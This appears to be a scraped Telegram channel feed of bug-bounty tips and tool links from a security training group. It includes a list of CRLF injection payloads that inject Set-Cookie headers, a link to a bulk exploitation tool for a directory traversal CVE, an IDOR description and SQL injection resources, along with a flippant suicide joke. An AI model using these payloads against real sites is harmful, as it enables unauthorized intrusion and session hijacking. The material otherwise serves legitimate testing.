Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
Bug Bounty Tip

CRLF Injection Attack Payload List

🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf

#bugbounty #cybersecurity #ethicalhacking
9👍5
👍3
How to fix the Crowdstrike thing:

1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
👉 InfiSCA: Your Open-Source Vulnerability Scanner
InfiSCA is an open-source software composition analysis (SCA) tool. Think of it as a security guard for your software supply chain.

🔗Download :
https://github.com/Infisical/infisical
👍71🔥1
📮JScripter - A noob-friendly JavaScript scraper based on #GAU and #hakrawler. Options to scan a single URL or multiple URLs from a list. Uses threads, saves files into a directory, and de-duplicates during saving.

Download-
https://github.com/ifconfig-me/JScripter

#BugBounty #bugbountytips
🔥8👍1
🚀 Apepe - Mobile application pentesting🚀

🕵️ Apepe is a Python tool developed to help pentesters and red teamers to easily get information from the target app. This tool will extract basic informations as the package name, if the app is signed and the development language...

🧾 Source - github.com/oppsec/Apepe
7
Do Sign Up for Top Notch Results 😎
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣15😁32🤯1
Best App For Sql Injection
Link -
https://github.com/darknethaxor/DH-HackBar
👍4🆒3
🤯🤯🤯🤯🤯🤯🤯🤯🤯🤯🤯🤯
Drop Your Suggestions for Resources
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣5😁2🙏1
🤣9
This media is not supported in your browser
VIEW IN TELEGRAM
BBRF-Client: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.

😚 https://github.com/honoki/bbrf-client/
Please open Telegram to view this post
VIEW IN TELEGRAM
👏2👍1
👍3
IDOR in Reset Password

When the user reset his password the application make an API request to make sure that username exists. If exist, it will come back with Personal Identifying Information (PII) in the response [Full name,Email,Phone number].

By:
@Maakthon

#bugbountytips
11👍4
🚨 CVE-2024-40348 🚨

👉 This is a bulk scanning and exploitation tool for CVE-2024-40348: Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. This vulnerability was discovered by 4rdr.

🔗 Download :
https://github.com/bigb0x/CVE-2024-40348
🔥21
Advanced SQL Injection Techniques by nav1n0x.pdf
1 MB
Advanced SQL Injection Techniques
7🔥1
🤩Hey everyone, thanks for being part of this awesome community!
🐸If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja ☕️ !
Please open Telegram to view this post
VIEW IN TELEGRAM
2🤝1
Brut Security pinned «🤩Hey everyone, thanks for being part of this awesome community! 🐸If you enjoy my content and want to support me, you can buy me a coffee on Ko-fi: https://ko-fi.com/brutxninja ☕️ !»
🚀A Practical Guide to Starting Your Cybersecurity Career in India🚀

✈️Link- https://ko-fi.com/post/A-Practical-Guide-to-Starting-Your-Cybersecurity-C-L4L410XGKI
Please open Telegram to view this post
VIEW IN TELEGRAM
1